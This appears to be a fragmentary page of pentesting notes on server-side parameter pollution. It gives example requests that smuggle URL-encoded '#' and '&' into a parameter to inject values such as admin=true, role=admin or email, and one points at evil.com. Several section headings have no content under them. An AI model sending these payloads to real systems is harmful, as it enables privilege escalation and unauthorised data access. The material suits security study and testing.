Server Side Parameter Pollution
Example:
GET /profile?user=1001%23//evil.com OR %26role=admin
(URL Encoded: %23># and %26>&)
GET /profile?user=1001%26admin=trueGET /userSearch?name=peter&back=/home
1 - Try
GET /userSearch?name=peter%23foo&back=/home
GET /userSearch?name=peter%26foo=xyz&back=/home
2 - If you've identified the email parameter, you could add it to the query string
GET /userSearch?name=peter%26email=foo&back=/home
Overriding parameters
REST Paths
Structured data
Example 1
Example 2
Burp Extension - Backslash Powered Scanning
Interesting Books
Interesting BooksSupport this Gitbook
Last updated
